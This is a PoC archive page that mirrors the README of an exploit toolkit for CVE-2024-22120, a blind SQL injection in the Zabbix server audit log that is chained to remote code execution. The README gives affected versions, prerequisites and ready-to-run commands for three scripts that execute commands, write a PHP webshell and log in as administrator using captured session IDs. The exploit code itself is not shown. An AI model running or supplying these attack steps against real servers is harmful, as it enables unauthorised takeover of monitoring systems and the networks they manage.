Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-22120 PoC — Time Based SQL Injection in Zabbix Server Audit Log

Source
https://github.com/W01fh4cker/CVE-2024-22120-RCE
Associated Vulnerability
Title:Time Based SQL Injection in Zabbix Server Audit Log (CVE-2024-22120)
Description:Zabbix server can perform command execution for configured scripts. After command is executed, audit entry is added to "Audit Log". Due to "clientip" field is not sanitized, it is possible to injection SQL into "clientip" and exploit time based blind SQL injection.
Description
Time Based SQL Injection in Zabbix Server Audit Log --> RCE
Readme
# CVE-2024-22120 ToolKit

# Affected Version/s

```
6.0.0 - 6.0.27
6.4.0 - 6.4.12
7.0.0alpha1
```

# Credit

https://x.com/mf0cuz

> https://support.zabbix.com/browse/ZBX-24505

> https://packetstormsecurity.com/files/137454/Zabbix-3.0.3-Remote-Command-Execution.html

# Premise

- a low-privilege user

- Have permission to execute scripts

  ![](https://cdn.jsdelivr.net/gh/W01fh4cker/blog_image@main/image-20240520113821013.png)

# Usage

## CVE-2024-22120-RCE

Capture packets to obtain sessionid and hostid:

![](https://cdn.jsdelivr.net/gh/W01fh4cker/blog_image@main/image-20240520113103613.png)

```
python -m pip install requests pwntools

python CVE-2024-22120-RCE.py --ip 192.168.198.136 --sid f026d1c7a3c36537cfe78fed35c7456a --hostid 10084
```

![](https://cdn.jsdelivr.net/gh/W01fh4cker/blog_image@main/image-20240520112956658.png)

## CVE-2024-22120-Webshell(Unable to use in most cases)

if you already have a session ID of Administrator privileged user, try:

```shell
python CVE-2024-22120-Webshell.py --ip 192.168.198.136 --aid fe647173d7769d55a43f161a68b256e0 --hostid 10084 --file shell.php
```

else:

```shell
python CVE-2024-22120-Webshell.py --ip 192.168.198.136 --sid f026d1c7a3c36537cfe78fed35c7456a --hostid 10084 --shell shell.php
```

But almost most of them cannot be written to the webshell through echo, because the execution user is zabbix:

![](https://cdn.jsdelivr.net/gh/W01fh4cker/blog_image@main/image-20240520160457471.png)

## CVE-2024-22120-LoginAsAdmin

```shell
python CVE-2024-22120-LoginAsAdmin.py --ip 192.168.198.136 --sid decf4ef56988027d62ca1db2a00d8346 --hostid 10084
```

![](https://cdn.jsdelivr.net/gh/W01fh4cker/blog_image@main/image-20240520175955624.png)

test:

![](https://cdn.jsdelivr.net/gh/W01fh4cker/blog_image@main/image-20240520180010132.png)

replace then refresh:

![](https://cdn.jsdelivr.net/gh/W01fh4cker/blog_image@main/image-20240520180055161.png)

login as admin!!!

![](https://cdn.jsdelivr.net/gh/W01fh4cker/blog_image@main/image-20240520180339314.png)
File Snapshot

 [4.0K]  /data/pocs/6892bc1da8cf799ef6f955ec71c7fb320cdfce47
├── [4.7K]  CVE-2024-22120-LoginAsAdmin.py
├── [5.6K]  CVE-2024-22120-RCE.py
├── [4.8K]  CVE-2024-22120-Webshell.py
└── [2.0K]  README.md

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →